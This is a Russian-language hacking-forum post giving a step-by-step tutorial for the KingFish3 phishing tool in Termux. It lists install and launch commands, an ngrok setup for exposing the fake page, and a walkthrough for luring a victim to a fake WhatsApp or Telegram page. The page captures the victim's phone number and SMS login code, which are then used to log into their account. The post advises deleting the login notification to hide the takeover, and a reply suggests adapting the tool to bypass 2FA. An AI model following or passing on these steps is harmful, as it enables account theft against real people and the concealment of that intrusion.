• XSS.stack #1 – первый литературный журнал от юзеров форума

KingFish3: Фишинг атака и не только

pablo

(L2) cache
Пользователь
Регистрация
01.02.2019
Сообщения
433
Реакции
1 524
Ссылка на github:

Установка.
Код:
$ pkg install git
$ pkg install python
$ pkg install php
$ pkg install openssh
$ git clone https://github.com/termux-lab/kingfish3
$ pip3 install prettytable

Запуск.
Код:
$ cd kingfish3
$ cd kingfish3.0
$ python3 fsh.py

Выбираем язык. (желательно русский)
И у нас там 2 варианта.
Фишинги и вещь, которая охотиться на гео данными.
Выбираем то, что нам нужно, указываем порт, и обязательно переадресацию(по умолчанию https://google.com)
И у нас запустится сервак.
Открываем 2 сессию и запускаем Ngrok.

Для тех у кого нет Ngrok.
Код:
$ git clone https://github.com/tchelospy/termux-ngrok
$ cd termux-ngrok
$ ./termux-ngrok.sh
$ y

Как работает KingFish3?

1) Маним жертву в ссылку
2) Следим за запросами в 1 сессии
3) как только появится номер телефона, указываем его куда надо.
Если вы выбрали Ватсапп, то указываем этот номер при регистрации в Ватсапе.
4) жмём далее
5) следим за запросами и ожидаем код
6) вводим полученный код. (#мывсистеме)

А как выглядит это со стороны жертвы?
1) перешёл по ссылке
2) указал номер телефона мол ватсап
3) приходит смс с кодом
4) вводит код и идёт дальше

Запускаем, получаем и кидаем ссылку жертве.

2d72c609bbcda4ba94f93.jpg


Жертва вводит номер телефона и жмёт далее.

8e356abfb5beb717b51c6.jpg


Затем жертва ожидает смс код, а мы получаем его номер телефона.

Открываем телегу и вводим этот номер. Затем Мы идём далее и жертве приходит смс с кодом.

2cb5ebedaf86f3deed628.jpg


Жерва вводит код, а мы получаем.

07a05d69f03105e9d7600.jpg

Затем открываем телегу, вводим этот код и мы вошли в аккаунт.

ec0b0243872bf7a50caf1.jpg

Там будет сообщение о входе, не забудьте сразу, как вошли, удалить это сообщение.
 
Последнее редактирование:
Нужно подкрутить под обход 2FA и тогда будет очень крутой инструмент
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх